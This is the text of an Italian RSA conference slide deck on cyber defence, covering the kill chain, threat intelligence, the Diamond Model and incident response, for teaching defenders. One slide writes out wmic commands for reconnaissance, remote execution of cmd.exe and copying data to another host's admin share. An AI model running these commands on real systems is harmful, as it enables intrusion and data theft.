SlideShare a Scribd company logo
1 of 20
Download to read offline
The more you
know the
better you do
@RSAEMEA
#RSAEMEASummit
Demetrio Milea,
Advanced Cyber Defence Consultant EMEA
2
© Copyright 2015 EMC Corporation. All rights reserved.
”Wherever he steps, whatever he touches, whatever he
leaves, even unconsciously, will serve as a silent witness
against him. Not only his fingerprints or his footprints, but
his hair, the fibers from his clothes, the glass he breaks,
the tool mark he leaves, the paint he scratches, the blood
he deposits.„
Edmond Locard (20° century) - Criminologo
It is impossible for a criminal to act, especially considering
the intensity of a crime, without leaving traces of this
presence.
Locard’s Exchange Principle
3
© Copyright 2015 EMC Corporation. All rights reserved.
Ciclo di vita di un attacco (aka Kill Chain)
1.
Intelligence
Gathering
2.
Initial
Exploitation
3.
Privilege
Escalation
4.
Rootkit &
CnC
5.
Lateral
Movement
6.
Data
Exfiltration
4
© Copyright 2015 EMC Corporation. All rights reserved.
Le tracce dell’attaccante
EndPoint Applicativo Network
https://blogs.rsa.com/eliminated-impossible/
5
© Copyright 2015 EMC Corporation. All rights reserved.
Il gap da colmare
La sicurezza aziendale di
tipo legacy
VS
L’innovazione
esponenziale della
sicurezza offensiva
6
© Copyright 2015 EMC Corporation. All rights reserved.
Anti
VirusSIEM
IDS
IPS
Fire
wall
Gli strumenti di sicurezza legacy
7
© Copyright 2015 EMC Corporation. All rights reserved.
Le aziende ancora oggi ...
•  Vulnerabilità a livello applicativo (RCE, XSS, SQLi)
•  Scarsa formazione dei dipendenti sulla sicurezza
•  Autenticazione ad un solo fattore
•  Policy e procedure datate
•  Controlli applicativi deboli
•  Applicazioni e sistemi operativi non aggiornati
•  Fornitori e terze parti non controllati
8
© Copyright 2015 EMC Corporation. All rights reserved.
•  Windows Management Instrumentation: tecnologia integrata nei S.O.
Microsoft (>= Windows 2000), che può essere utilizzata dall'amministratore di
sistema per la gestione di workstation/server locali o remoti.
•  WQL è un subset semplificato del linguaggio SQL (Structured Query Language),
con alcune estensioni specifiche di WMI
•  É possibile eseguire comandi WMI in:
–  VBScript
–  JavaScript
–  PowerShell
•  wmic.exe tramite linea di comando ci permette di accedere a WMI
... gli attaccanti invece
MALICIOUS USE CASE!
9
© Copyright 2015 EMC Corporation. All rights reserved.
•  Information Gathering
–  Elenco delle patch installate, dei processi in esecuzione (locali e remoti), account
utenti, risorse condivise in rete. Es.
•  wmic path win32_process get Caption,Processid,Commandline
•  wmic qfe get
•  wmic nicconfig where IPEnabled=’true’
•  wmic process where (Name=’svchost.exe’) get name,processid
•  wmic /node:remote /user:user /password:pass service get Name,Caption,State,ServiceType,pathname
•  Lateral Movement
–  Esecuzione di comandi da remoto: Esempo: wmic /node:hostname /user:username /
password:pass PROCESS CALL CREATE cmd.exe
•  Data Exifiltration
–  Esempio: wmic /NODE:hostname /user:username /password:pass process call create
xcopy d:calc.rar ninjahostc$a.dat
(Ab)Using WMI
10
© Copyright 2015 EMC Corporation. All rights reserved.
•  Versione 2.0 in Windows 7.0, V.3 in Win7 SP1, Win2008 R2 SP1 etc
•  Basato su programmazione ad oggetti e Framework .NET
•  Simile al C#
Power[Shell|Sploit]
PowerSploit
•  Collezione di script (organizzati per categorie) in PowerShell
che possono essere utilizzati in tutte le fasi di un attacco.
–  Antivirus Bypass - Find bytes of a file which has a matching signature in antivirus.
–  Code Execution - Used to execute code on victim machine.
–  Exfiltration - Manipulate and collect information & data from victim machine(s).
–  Persistence - Maintain control to machine by adding persistence to scripts.
–  Recon - Perform reconnaissance tasks using victim machine.
11
© Copyright 2015 EMC Corporation. All rights reserved.
Realtà o percezione?
Comunicazione
Formazione
Visibilità
Non è possibile controllare ciò che non si vede!
12
© Copyright 2015 EMC Corporation. All rights reserved.
Gli attacchi sono inevitabili
”I am convinced that there are only two types of companies: those
that have been hacked and those that will be. And even they are
converging into one category: companies that have been hacked
and will be hacked again.„
- Robert Mueller (RSAC 2012), 6th Director of the FBI
Cyber Threat Intel, Incident Detection and Response
13
© Copyright 2015 EMC Corporation. All rights reserved.
Cybercrime Response Strategy
Analizzare e
documentare il
modus
operandi degli
attaccanti
Rilevare gli
attacchi
dalle loro
tracce
Mitigare
l’attacco.
Profilare i
pattern
dell’attacco
subito
Cyber Threat Intel
Incident Response Strategy
Threat Indicators & Incident Detection
14
© Copyright 2015 EMC Corporation. All rights reserved.
Cyber Threat Intelligence cycle
https://blogs.rsa.com/intelligence-needs-operationalized/
Collection
Dark Web
Commercial
Network
Analysis
Attribution
Analysis
Content
Management
Automated Processing
Payload
Analysis
Strategic/Operational
Reporting
Technical Analysis Report
(Tactical Reporting)
IOCs
IDS/IPS
Firewall
SIEM
Identify & AnalyzeMonitor & Collect DisseminateCommunicate
15
© Copyright 2015 EMC Corporation. All rights reserved.
Profilare l’attacco e l’attaccante
Adversary
Capability
Email Headers
Attachment
Encryption
Victim
Infrastructure
Mail Sender IP
Domains, Ips
Destination IP
Modello analitico sia per modellare sia per rendere operative le
informazioni di intelligence.
Utilizzato da:
•  Incident Responder
•  Threat Intel Analyst
•  Risk Analyst
Axiom 1: For every intrusion
event there exists an adversary
taking a step towards an
intended goal by using a
capability over infrastructure
against a victim to produce a
result.
The Diamond Model
http://www.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf
16
© Copyright 2015 EMC Corporation. All rights reserved.
Profilare l’attacco e l’attaccante
http://www.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf
Adversary
Capability
Victim
Infrastruct
ure
Adversary
Capability
Victim
Infrastructure
•  X-Mailer: Outlook Express
•  update.pdf.exe
•  POST /callhome.php
•  click.me
•  192.158.x.x
The Diamond Model – Un caso di phishing segnalato dalla vittima
17
© Copyright 2015 EMC Corporation. All rights reserved.
Prepararsi a rispondere un incidente
Identificare gli obiettivi da raggiungere
Valutare le competenze (P.P.T.) esistenti
Classificare assets, dati e utenti
Formare un gruppo di IR
Educare e praticare attività di IR
Automatizzare e misurare
Gestire meglio incidenti futuri applicando le
conoscenze acquisite da incidenti passati.
What
When
Where
How
Who
Why
https://blogs.rsa.com/human-process-elements-incident-response-plan/
18
© Copyright 2015 EMC Corporation. All rights reserved.
Metodo OODA per una risposta efficace
•  Observe and Orient e continua
comprensione:
–  Business
–  Superficie di attacco
–  Dei dati, della rete dei flussi di
applicativi
•  Decide & Act:
–  Dati raccolti nelle fase precedenti
–  Avendo analizzato tutte le possibili
opzioni e conseguenze
–  C-Level
–  Seguendo le policy e le procedure John Boyd (1927 – 1997, Military Strategist)
The OODA loop
19
© Copyright 2015 EMC Corporation. All rights reserved.
Conclusioni
•  Content Analytics
–  Contesto di business e profilo di rischio per asset
aziendale
•  Persone, Processi, Tecnologia
–  Tecnologia per promuovere la visibilità, le persone
e i processi per identificare e risolvere gli incidenti.
•  Threat Intelligence
–  Prioritizzare e rendere operative le informazioni
di intelligence (interna, esterna, pubblica e privata).
EMC, RSA, the EMC logo and the RSA logo are trademarks of EMC Corporation in the U.S. and other countries.

More Related Content

Similar to The more you know the better you do

DEFCON 23 - Ballenthin Graeber Teodorescu - WMI Attacks Defense
DEFCON 23 - Ballenthin Graeber Teodorescu - WMI Attacks DefenseDEFCON 23 - Ballenthin Graeber Teodorescu - WMI Attacks Defense
DEFCON 23 - Ballenthin Graeber Teodorescu - WMI Attacks DefenseFelipe Prado
 
Cisco Security Presentation
Cisco Security PresentationCisco Security Presentation
Cisco Security PresentationSimplex
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewRobert Herjavec
 
Security automation in virtual and cloud environments v2
Security automation in virtual and cloud environments v2Security automation in virtual and cloud environments v2
Security automation in virtual and cloud environments v2rpark31
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksIBM Security
 
MIT-6-determina-vps.ppt
MIT-6-determina-vps.pptMIT-6-determina-vps.ppt
MIT-6-determina-vps.pptwebhostingguy
 
Detecting Evasive Malware in Sandbox
Detecting Evasive Malware in SandboxDetecting Evasive Malware in Sandbox
Detecting Evasive Malware in SandboxRahul Mohandas
 
Making Threat Management More Manageable
Making Threat Management More ManageableMaking Threat Management More Manageable
Making Threat Management More ManageableIBM Security
 
Cansec West 2009
Cansec West 2009Cansec West 2009
Cansec West 2009abhicc285
 
Offensive malware usage and defense
Offensive malware usage and defenseOffensive malware usage and defense
Offensive malware usage and defenseChristiaan Beek
 
Cyber Defense Automation
Cyber Defense AutomationCyber Defense Automation
Cyber Defense Automation♟Sergej Epp
 
Tackle Unknown Threats with Symantec Endpoint Protection 14 Machine Learning
Tackle Unknown Threats with Symantec Endpoint Protection 14 Machine LearningTackle Unknown Threats with Symantec Endpoint Protection 14 Machine Learning
Tackle Unknown Threats with Symantec Endpoint Protection 14 Machine LearningSymantec
 
Advanced Threats In The Enterprise
Advanced Threats In The EnterpriseAdvanced Threats In The Enterprise
Advanced Threats In The EnterprisePriyanka Aash
 
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical OverviewCyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical OverviewSymantec
 
Future-proofing maritime ports against emerging cyber-physical threats
Future-proofing maritime ports against emerging cyber-physical threatsFuture-proofing maritime ports against emerging cyber-physical threats
Future-proofing maritime ports against emerging cyber-physical threatsSteven SIM Kok Leong
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
 
Make Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile SecurityMake Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile SecurityMichael Davis
 
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionGISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionShah Sheikh
 
The Four Horsemen of Mobile Security
The Four Horsemen of Mobile SecurityThe Four Horsemen of Mobile Security
The Four Horsemen of Mobile SecuritySkycure
 

Similar to The more you know the better you do (20)

DEFCON 23 - Ballenthin Graeber Teodorescu - WMI Attacks Defense
DEFCON 23 - Ballenthin Graeber Teodorescu - WMI Attacks DefenseDEFCON 23 - Ballenthin Graeber Teodorescu - WMI Attacks Defense
DEFCON 23 - Ballenthin Graeber Teodorescu - WMI Attacks Defense
 
Cisco Security Presentation
Cisco Security PresentationCisco Security Presentation
Cisco Security Presentation
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR Overview
 
Security automation in virtual and cloud environments v2
Security automation in virtual and cloud environments v2Security automation in virtual and cloud environments v2
Security automation in virtual and cloud environments v2
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
 
MIT-6-determina-vps.ppt
MIT-6-determina-vps.pptMIT-6-determina-vps.ppt
MIT-6-determina-vps.ppt
 
Detecting Evasive Malware in Sandbox
Detecting Evasive Malware in SandboxDetecting Evasive Malware in Sandbox
Detecting Evasive Malware in Sandbox
 
Making Threat Management More Manageable
Making Threat Management More ManageableMaking Threat Management More Manageable
Making Threat Management More Manageable
 
Cansec West 2009
Cansec West 2009Cansec West 2009
Cansec West 2009
 
Offensive malware usage and defense
Offensive malware usage and defenseOffensive malware usage and defense
Offensive malware usage and defense
 
Cyber Defense Automation
Cyber Defense AutomationCyber Defense Automation
Cyber Defense Automation
 
Tackle Unknown Threats with Symantec Endpoint Protection 14 Machine Learning
Tackle Unknown Threats with Symantec Endpoint Protection 14 Machine LearningTackle Unknown Threats with Symantec Endpoint Protection 14 Machine Learning
Tackle Unknown Threats with Symantec Endpoint Protection 14 Machine Learning
 
Advanced Threats In The Enterprise
Advanced Threats In The EnterpriseAdvanced Threats In The Enterprise
Advanced Threats In The Enterprise
 
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical OverviewCyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
 
Future-proofing maritime ports against emerging cyber-physical threats
Future-proofing maritime ports against emerging cyber-physical threatsFuture-proofing maritime ports against emerging cyber-physical threats
Future-proofing maritime ports against emerging cyber-physical threats
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Make Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile SecurityMake Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile Security
 
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionGISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
 
Security_Bootcamp_Intro
Security_Bootcamp_IntroSecurity_Bootcamp_Intro
Security_Bootcamp_Intro
 
The Four Horsemen of Mobile Security
The Four Horsemen of Mobile SecurityThe Four Horsemen of Mobile Security
The Four Horsemen of Mobile Security
 

Recently uploaded

Intro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxIntro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxFIDO Alliance
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctBrainSell Technologies
 
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxCyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxMasterG
 
AI mind or machine power point presentation
AI mind or machine power point presentationAI mind or machine power point presentation
AI mind or machine power point presentationyogeshlabana357357
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxFIDO Alliance
 
How to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in PakistanHow to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in Pakistandanishmna97
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsLeah Henrickson
 
Generative AI Use Cases and Applications.pdf
Generative AI Use Cases and Applications.pdfGenerative AI Use Cases and Applications.pdf
Generative AI Use Cases and Applications.pdfalexjohnson7307
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGDSC PJATK
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityVictorSzoltysek
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuidePixlogix Infotech
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfdanishmna97
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdfMuhammad Subhan
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxFIDO Alliance
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)Wonjun Hwang
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxjbellis
 
Microsoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireMicrosoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireExakis Nelite
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data SciencePaolo Missier
 

Recently uploaded (20)

Intro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptxIntro to Passkeys and the State of Passwordless.pptx
Intro to Passkeys and the State of Passwordless.pptx
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage Intacct
 
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxCyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
 
AI mind or machine power point presentation
AI mind or machine power point presentationAI mind or machine power point presentation
AI mind or machine power point presentation
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptx
 
How to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in PakistanHow to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in Pakistan
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
Generative AI Use Cases and Applications.pdf
Generative AI Use Cases and Applications.pdfGenerative AI Use Cases and Applications.pdf
Generative AI Use Cases and Applications.pdf
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 Warsaw
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps Productivity
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cf
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptx
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptx
 
Microsoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireMicrosoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - Questionnaire
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data Science
 

The more you know the better you do

  • 1. The more you know the better you do @RSAEMEA #RSAEMEASummit Demetrio Milea, Advanced Cyber Defence Consultant EMEA
  • 2. 2 © Copyright 2015 EMC Corporation. All rights reserved. ”Wherever he steps, whatever he touches, whatever he leaves, even unconsciously, will serve as a silent witness against him. Not only his fingerprints or his footprints, but his hair, the fibers from his clothes, the glass he breaks, the tool mark he leaves, the paint he scratches, the blood he deposits.„ Edmond Locard (20° century) - Criminologo It is impossible for a criminal to act, especially considering the intensity of a crime, without leaving traces of this presence. Locard’s Exchange Principle
  • 3. 3 © Copyright 2015 EMC Corporation. All rights reserved. Ciclo di vita di un attacco (aka Kill Chain) 1. Intelligence Gathering 2. Initial Exploitation 3. Privilege Escalation 4. Rootkit & CnC 5. Lateral Movement 6. Data Exfiltration
  • 4. 4 © Copyright 2015 EMC Corporation. All rights reserved. Le tracce dell’attaccante EndPoint Applicativo Network https://blogs.rsa.com/eliminated-impossible/
  • 5. 5 © Copyright 2015 EMC Corporation. All rights reserved. Il gap da colmare La sicurezza aziendale di tipo legacy VS L’innovazione esponenziale della sicurezza offensiva
  • 6. 6 © Copyright 2015 EMC Corporation. All rights reserved. Anti VirusSIEM IDS IPS Fire wall Gli strumenti di sicurezza legacy
  • 7. 7 © Copyright 2015 EMC Corporation. All rights reserved. Le aziende ancora oggi ... •  Vulnerabilità a livello applicativo (RCE, XSS, SQLi) •  Scarsa formazione dei dipendenti sulla sicurezza •  Autenticazione ad un solo fattore •  Policy e procedure datate •  Controlli applicativi deboli •  Applicazioni e sistemi operativi non aggiornati •  Fornitori e terze parti non controllati
  • 8. 8 © Copyright 2015 EMC Corporation. All rights reserved. •  Windows Management Instrumentation: tecnologia integrata nei S.O. Microsoft (>= Windows 2000), che può essere utilizzata dall'amministratore di sistema per la gestione di workstation/server locali o remoti. •  WQL è un subset semplificato del linguaggio SQL (Structured Query Language), con alcune estensioni specifiche di WMI •  É possibile eseguire comandi WMI in: –  VBScript –  JavaScript –  PowerShell •  wmic.exe tramite linea di comando ci permette di accedere a WMI ... gli attaccanti invece MALICIOUS USE CASE!
  • 9. 9 © Copyright 2015 EMC Corporation. All rights reserved. •  Information Gathering –  Elenco delle patch installate, dei processi in esecuzione (locali e remoti), account utenti, risorse condivise in rete. Es. •  wmic path win32_process get Caption,Processid,Commandline •  wmic qfe get •  wmic nicconfig where IPEnabled=’true’ •  wmic process where (Name=’svchost.exe’) get name,processid •  wmic /node:remote /user:user /password:pass service get Name,Caption,State,ServiceType,pathname •  Lateral Movement –  Esecuzione di comandi da remoto: Esempo: wmic /node:hostname /user:username / password:pass PROCESS CALL CREATE cmd.exe •  Data Exifiltration –  Esempio: wmic /NODE:hostname /user:username /password:pass process call create xcopy d:calc.rar ninjahostc$a.dat (Ab)Using WMI
  • 10. 10 © Copyright 2015 EMC Corporation. All rights reserved. •  Versione 2.0 in Windows 7.0, V.3 in Win7 SP1, Win2008 R2 SP1 etc •  Basato su programmazione ad oggetti e Framework .NET •  Simile al C# Power[Shell|Sploit] PowerSploit •  Collezione di script (organizzati per categorie) in PowerShell che possono essere utilizzati in tutte le fasi di un attacco. –  Antivirus Bypass - Find bytes of a file which has a matching signature in antivirus. –  Code Execution - Used to execute code on victim machine. –  Exfiltration - Manipulate and collect information & data from victim machine(s). –  Persistence - Maintain control to machine by adding persistence to scripts. –  Recon - Perform reconnaissance tasks using victim machine.
  • 11. 11 © Copyright 2015 EMC Corporation. All rights reserved. Realtà o percezione? Comunicazione Formazione Visibilità Non è possibile controllare ciò che non si vede!
  • 12. 12 © Copyright 2015 EMC Corporation. All rights reserved. Gli attacchi sono inevitabili ”I am convinced that there are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again.„ - Robert Mueller (RSAC 2012), 6th Director of the FBI Cyber Threat Intel, Incident Detection and Response
  • 13. 13 © Copyright 2015 EMC Corporation. All rights reserved. Cybercrime Response Strategy Analizzare e documentare il modus operandi degli attaccanti Rilevare gli attacchi dalle loro tracce Mitigare l’attacco. Profilare i pattern dell’attacco subito Cyber Threat Intel Incident Response Strategy Threat Indicators & Incident Detection
  • 14. 14 © Copyright 2015 EMC Corporation. All rights reserved. Cyber Threat Intelligence cycle https://blogs.rsa.com/intelligence-needs-operationalized/ Collection Dark Web Commercial Network Analysis Attribution Analysis Content Management Automated Processing Payload Analysis Strategic/Operational Reporting Technical Analysis Report (Tactical Reporting) IOCs IDS/IPS Firewall SIEM Identify & AnalyzeMonitor & Collect DisseminateCommunicate
  • 15. 15 © Copyright 2015 EMC Corporation. All rights reserved. Profilare l’attacco e l’attaccante Adversary Capability Email Headers Attachment Encryption Victim Infrastructure Mail Sender IP Domains, Ips Destination IP Modello analitico sia per modellare sia per rendere operative le informazioni di intelligence. Utilizzato da: •  Incident Responder •  Threat Intel Analyst •  Risk Analyst Axiom 1: For every intrusion event there exists an adversary taking a step towards an intended goal by using a capability over infrastructure against a victim to produce a result. The Diamond Model http://www.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf
  • 16. 16 © Copyright 2015 EMC Corporation. All rights reserved. Profilare l’attacco e l’attaccante http://www.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf Adversary Capability Victim Infrastruct ure Adversary Capability Victim Infrastructure •  X-Mailer: Outlook Express •  update.pdf.exe •  POST /callhome.php •  click.me •  192.158.x.x The Diamond Model – Un caso di phishing segnalato dalla vittima
  • 17. 17 © Copyright 2015 EMC Corporation. All rights reserved. Prepararsi a rispondere un incidente Identificare gli obiettivi da raggiungere Valutare le competenze (P.P.T.) esistenti Classificare assets, dati e utenti Formare un gruppo di IR Educare e praticare attività di IR Automatizzare e misurare Gestire meglio incidenti futuri applicando le conoscenze acquisite da incidenti passati. What When Where How Who Why https://blogs.rsa.com/human-process-elements-incident-response-plan/
  • 18. 18 © Copyright 2015 EMC Corporation. All rights reserved. Metodo OODA per una risposta efficace •  Observe and Orient e continua comprensione: –  Business –  Superficie di attacco –  Dei dati, della rete dei flussi di applicativi •  Decide & Act: –  Dati raccolti nelle fase precedenti –  Avendo analizzato tutte le possibili opzioni e conseguenze –  C-Level –  Seguendo le policy e le procedure John Boyd (1927 – 1997, Military Strategist) The OODA loop
  • 19. 19 © Copyright 2015 EMC Corporation. All rights reserved. Conclusioni •  Content Analytics –  Contesto di business e profilo di rischio per asset aziendale •  Persone, Processi, Tecnologia –  Tecnologia per promuovere la visibilità, le persone e i processi per identificare e risolvere gli incidenti. •  Threat Intelligence –  Prioritizzare e rendere operative le informazioni di intelligence (interna, esterna, pubblica e privata).
  • 20. EMC, RSA, the EMC logo and the RSA logo are trademarks of EMC Corporation in the U.S. and other countries.